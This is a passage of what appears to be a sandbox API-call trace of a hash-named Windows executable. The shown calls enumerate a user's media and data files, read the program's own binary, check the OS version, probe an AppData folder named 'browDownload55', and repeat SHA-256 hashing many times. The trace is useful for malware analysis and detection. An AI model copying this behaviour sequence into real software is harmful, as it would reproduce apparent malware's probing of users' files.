ftLastAccessTime.dwLowDateTime=0xadc70170, ftLastAccessTime.dwHighDateTime=0x1d7ade7, ftLastWriteTime.dwLowDateTime=0xadc70170, ftLastWriteTime.dwHighDateTime=0x1d7ade7, nFileSizeHigh=0x0, nFileSizeLow=0x187ce, dwReserved0=0xe1bc, dwReserved1=0x0, cFileName="wuAT.csv", cAlternateFileName="")) returned 1 [0117.867] FindNextFileW (in: hFindFile=0x716110, lpFindFileData=0xcdda0 | out: lpFindFileData=0xcdda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb57584b0, ftCreationTime.dwHighDateTime=0x1d7a2bf, ftLastAccessTime.dwLowDateTime=0xd3281930, ftLastAccessTime.dwHighDateTime=0x1d7aad7, ftLastWriteTime.dwLowDateTime=0xd3281930, ftLastWriteTime.dwHighDateTime=0x1d7aad7, nFileSizeHigh=0x0, nFileSizeLow=0x8862, dwReserved0=0xe1bc, dwReserved1=0x0, cFileName="WXe_5du7wV.jpg", cAlternateFileName="WXE_5D~1.JPG")) returned 1 [0117.867] FindNextFileW (in: hFindFile=0x716110, lpFindFileData=0xcdda0 | out: lpFindFileData=0xcdda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf2ad8ba0, ftCreationTime.dwHighDateTime=0x1d7a159, ftLastAccessTime.dwLowDateTime=0x9ff88e50, ftLastAccessTime.dwHighDateTime=0x1d7ac8a, ftLastWriteTime.dwLowDateTime=0x9ff88e50, ftLastWriteTime.dwHighDateTime=0x1d7ac8a, nFileSizeHigh=0x0, nFileSizeLow=0x81ca, dwReserved0=0xe1bc, dwReserved1=0x0, cFileName="yOuB2Oo8zptw.mkv", cAlternateFileName="YOUB2O~1.MKV")) returned 1 [0117.867] FindNextFileW (in: hFindFile=0x716110, lpFindFileData=0xcdda0 | out: lpFindFileData=0xcdda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x62bee7e0, ftCreationTime.dwHighDateTime=0x1d7ab0a, ftLastAccessTime.dwLowDateTime=0xa96aacc0, ftLastAccessTime.dwHighDateTime=0x1d7ae56, ftLastWriteTime.dwLowDateTime=0xa96aacc0, ftLastWriteTime.dwHighDateTime=0x1d7ae56, nFileSizeHigh=0x0, nFileSizeLow=0xf6a1, dwReserved0=0xe1bc, dwReserved1=0x0, cFileName="ZBzS xenf.flv", cAlternateFileName="ZBZSXE~1.FLV")) returned 1 [0117.867] FindNextFileW (in: hFindFile=0x716110, lpFindFileData=0xcdda0 | out: lpFindFileData=0xcdda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x62bee7e0, ftCreationTime.dwHighDateTime=0x1d7ab0a, ftLastAccessTime.dwLowDateTime=0xa96aacc0, ftLastAccessTime.dwHighDateTime=0x1d7ae56, ftLastWriteTime.dwLowDateTime=0xa96aacc0, ftLastWriteTime.dwHighDateTime=0x1d7ae56, nFileSizeHigh=0x0, nFileSizeLow=0xf6a1, dwReserved0=0xe1bc, dwReserved1=0x0, cFileName="ZBzS xenf.flv", cAlternateFileName="ZBZSXE~1.FLV")) returned 0 [0117.867] FindClose (in: hFindFile=0x716110 | out: hFindFile=0x716110) returned 1 [0117.867] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0xce880 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0117.880] lstrcmpiW (lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 1 [0117.880] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e41030 [0117.880] GetTickCount () returned 0xe87585 [0117.880] GetTickCount () returned 0xe87585 [0117.880] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32e40e70, Size=0x270) returned 0x32e410c0 [0117.880] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32b43f30 | out: hHeap=0x2150000) returned 1 [0117.880] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40f50 | out: hHeap=0x2150000) returned 1 [0117.880] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x70) returned 0x32b43f30 [0117.880] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0xf0) returned 0x32e40e70 [0117.880] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32b43e50 | out: hHeap=0x2150000) returned 1 [0117.880] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40d90 | out: hHeap=0x2150000) returned 1 [0117.880] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e410c0 | out: hHeap=0x2150000) returned 1 [0117.881] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x22c [0117.881] SetFilePointer (in: hFile=0x22c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x8103b [0117.881] SetFilePointer (in: hFile=0x22c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0117.881] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x81040) returned 0x32a44720 [0117.890] ReadFile (in: hFile=0x22c, lpBuffer=0x32a44720, nNumberOfBytesToRead=0x8103b, lpNumberOfBytesRead=0xcec9c, lpOverlapped=0x0 | out: lpBuffer=0x32a44720*, lpNumberOfBytesRead=0xcec9c*=0x8103b, lpOverlapped=0x0) returned 1 [0117.893] CloseHandle (hObject=0x22c) returned 1 [0117.895] CoInitialize (pvReserved=0x0) returned 0x0 [0119.173] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x40) returned 0x32e40f70 [0119.173] GetTickCount () returned 0xe87a96 [0119.173] GetTickCount () returned 0xe87a96 [0119.173] GetTickCount () returned 0xe87a96 [0119.177] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xcecc8 | out: lpSystemTimeAsFileTime=0xcecc8*(dwLowDateTime=0xd38c8564, dwHighDateTime=0x1d7b3c9)) [0119.177] RtlGetVersion (in: lpVersionInformation=0xcebc0 | out: lpVersionInformation=0xcebc0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 0x0 [0119.177] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x170) returned 0x32e410c0 [0119.178] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x70) returned 0x32e40d90 [0119.178] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e410c0 | out: hHeap=0x2150000) returned 1 [0119.178] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\*", lpFindFileData=0xce240 | out: lpFindFileData=0xce240*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x1, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x28b14d57, cFileName="翻", cAlternateFileName="")) returned 0xffffffffffffffff [0119.178] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x40) returned 0x32e40e10 [0119.178] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x5b0) returned 0x32e410c0 [0119.178] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x1000) returned 0x32e41680 [0119.178] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.179] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.179] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x20, dwFlags=0x0) returned 1 [0119.179] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x4, pbData=0xceadc, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0xceadc, pdwDataLen=0xceaec) returned 1 [0119.179] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e40fc0 [0119.179] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x2, pbData=0x32e40fc0, pdwDataLen=0xceadc, dwFlags=0x0 | out: pbData=0x32e40fc0, pdwDataLen=0xceadc) returned 1 [0119.179] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.179] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.179] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.180] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.180] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x40, dwFlags=0x0) returned 1 [0119.180] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x4, pbData=0xceadc, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0xceadc, pdwDataLen=0xceaec) returned 1 [0119.180] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e40ff0 [0119.180] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x2, pbData=0x32e40ff0, pdwDataLen=0xceadc, dwFlags=0x0 | out: pbData=0x32e40ff0, pdwDataLen=0xceadc) returned 1 [0119.180] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.180] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.180] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.180] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.180] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x60, dwFlags=0x0) returned 1 [0119.180] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x4, pbData=0xceadc, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0xceadc, pdwDataLen=0xceaec) returned 1 [0119.180] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32b43e50 [0119.180] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x2, pbData=0x32b43e50, pdwDataLen=0xceadc, dwFlags=0x0 | out: pbData=0x32b43e50, pdwDataLen=0xceadc) returned 1 [0119.180] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.181] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.181] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.181] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.181] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x80, dwFlags=0x0) returned 1 [0119.181] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x4, pbData=0xceadc, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0xceadc, pdwDataLen=0xceaec) returned 1 [0119.181] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32b43e80 [0119.181] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x2, pbData=0x32b43e80, pdwDataLen=0xceadc, dwFlags=0x0 | out: pbData=0x32b43e80, pdwDataLen=0xceadc) returned 1 [0119.181] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.181] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.181] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.182] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.182] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0xa0, dwFlags=0x0) returned 1 [0119.182] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x4, pbData=0xceadc, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0xceadc, pdwDataLen=0xceaec) returned 1 [0119.182] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32b43eb0 [0119.182] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x2, pbData=0x32b43eb0, pdwDataLen=0xceadc, dwFlags=0x0 | out: pbData=0x32b43eb0, pdwDataLen=0xceadc) returned 1 [0119.182] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.182] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.182] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.183] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.183] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0xc0, dwFlags=0x0) returned 1 [0119.183] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x4, pbData=0xceadc, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0xceadc, pdwDataLen=0xceaec) returned 1 [0119.183] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32b43ee0 [0119.183] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x2, pbData=0x32b43ee0, pdwDataLen=0xceadc, dwFlags=0x0 | out: pbData=0x32b43ee0, pdwDataLen=0xceadc) returned 1 [0119.183] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.183] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.183] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.183] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.183] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0xe0, dwFlags=0x0) returned 1 [0119.183] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x4, pbData=0xceadc, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0xceadc, pdwDataLen=0xceaec) returned 1 [0119.183] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e42690 [0119.183] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x2, pbData=0x32e42690, pdwDataLen=0xceadc, dwFlags=0x0 | out: pbData=0x32e42690, pdwDataLen=0xceadc) returned 1 [0119.184] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.184] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.184] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.184] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.184] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x100, dwFlags=0x0) returned 1 [0119.184] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x4, pbData=0xceadc, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0xceadc, pdwDataLen=0xceaec) returned 1 [0119.184] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e426c0 [0119.184] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x2, pbData=0x32e426c0, pdwDataLen=0xceadc, dwFlags=0x0 | out: pbData=0x32e426c0, pdwDataLen=0xceadc) returned 1 [0119.184] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.184] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.184] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.185] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.185] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x120, dwFlags=0x0) returned 1 [0119.185] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x4, pbData=0xceadc, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0xceadc, pdwDataLen=0xceaec) returned 1 [0119.185] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e426f0 [0119.185] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x2, pbData=0x32e426f0, pdwDataLen=0xceadc, dwFlags=0x0 | out: pbData=0x32e426f0, pdwDataLen=0xceadc) returned 1 [0119.185] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.185] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.185] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.185] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.185] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x140, dwFlags=0x0) returned 1 [0119.186] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x4, pbData=0xceadc, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0xceadc, pdwDataLen=0xceaec) returned 1 [0119.186] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e42720 [0119.186] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x2, pbData=0x32e42720, pdwDataLen=0xceadc, dwFlags=0x0 | out: pbData=0x32e42720, pdwDataLen=0xceadc) returned 1 [0119.186] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.186] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.186] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.186] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.186] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x160, dwFlags=0x0) returned 1 [0119.186] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x4, pbData=0xceadc, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0xceadc, pdwDataLen=0xceaec) returned 1 [0119.186] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e42750 [0119.186] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x2, pbData=0x32e42750, pdwDataLen=0xceadc, dwFlags=0x0 | out: pbData=0x32e42750, pdwDataLen=0xceadc) returned 1 [0119.186] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.186] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.186] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.187] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.187] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x180, dwFlags=0x0) returned 1 [0119.187] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x4, pbData=0xceadc, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0xceadc, pdwDataLen=0xceaec) returned 1 [0119.187] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e42780 [0119.187] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x2, pbData=0x32e42780, pdwDataLen=0xceadc, dwFlags=0x0 | out: pbData=0x32e42780, pdwDataLen=0xceadc) returned 1 [0119.187] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.187] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.187] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.188] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.188] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x1a0, dwFlags=0x0) returned 1 [0119.188] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x4, pbData=0xceadc, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0xceadc, pdwDataLen=0xceaec) returned 1 [0119.188] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e427b0 [0119.188] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x2, pbData=0x32e427b0, pdwDataLen=0xceadc, dwFlags=0x0 | out: pbData=0x32e427b0, pdwDataLen=0xceadc) returned 1 [0119.188] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.188] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.188] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.188] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.188] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x1c0, dwFlags=0x0) returned 1 [0119.188] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x4, pbData=0xceadc, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0xceadc, pdwDataLen=0xceaec) returned 1 [0119.188] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e40700 [0119.190] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x2, pbData=0x32e40700, pdwDataLen=0xceadc, dwFlags=0x0 | out: pbData=0x32e40700, pdwDataLen=0xceadc) returned 1 [0119.190] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.190] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.190] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.190] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.190] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x1e0, dwFlags=0x0) returned 1 [0119.190] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x4, pbData=0xceadc, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0xceadc, pdwDataLen=0xceaec) returned 1 [0119.190] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e44ea0 [0119.190] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x2, pbData=0x32e44ea0, pdwDataLen=0xceadc, dwFlags=0x0 | out: pbData=0x32e44ea0, pdwDataLen=0xceadc) returned 1 [0119.190] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.190] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.190] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.191] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.191] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x200, dwFlags=0x0) returned 1 [0119.191] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x4, pbData=0xceadc, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0xceadc, pdwDataLen=0xceaec) returned 1 [0119.191] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e44f30 [0119.191] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x2, pbData=0x32e44f30, pdwDataLen=0xceadc, dwFlags=0x0 | out: pbData=0x32e44f30, pdwDataLen=0xceadc) returned 1 [0119.191] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.191] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.191] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.192] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.192] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x220, dwFlags=0x0) returned 1 [0119.192] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x4, pbData=0xceadc, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0xceadc, pdwDataLen=0xceaec) returned 1 [0119.192] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e44ff0 [0119.192] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x2, pbData=0x32e44ff0, pdwDataLen=0xceadc, dwFlags=0x0 | out: pbData=0x32e44ff0, pdwDataLen=0xceadc) returned 1 [0119.192] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.192] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.192] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.193] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.193] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x240, dwFlags=0x0) returned 1 [0119.193] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x4, pbData=0xceadc, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0xceadc, pdwDataLen=0xceaec) returned 1 [0119.193] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e45050 [0119.193] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x2, pbData=0x32e45050, pdwDataLen=0xceadc, dwFlags=0x0 | out: pbData=0x32e45050, pdwDataLen=0xceadc) returned 1 [0119.193] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.193] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.193] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.193] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.193] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x260, dwFlags=0x0) returned 1 [0119.193] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x4, pbData=0xceadc, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0xceadc, pdwDataLen=0xceaec) returned 1 [0119.193] RtlAllocateHeap 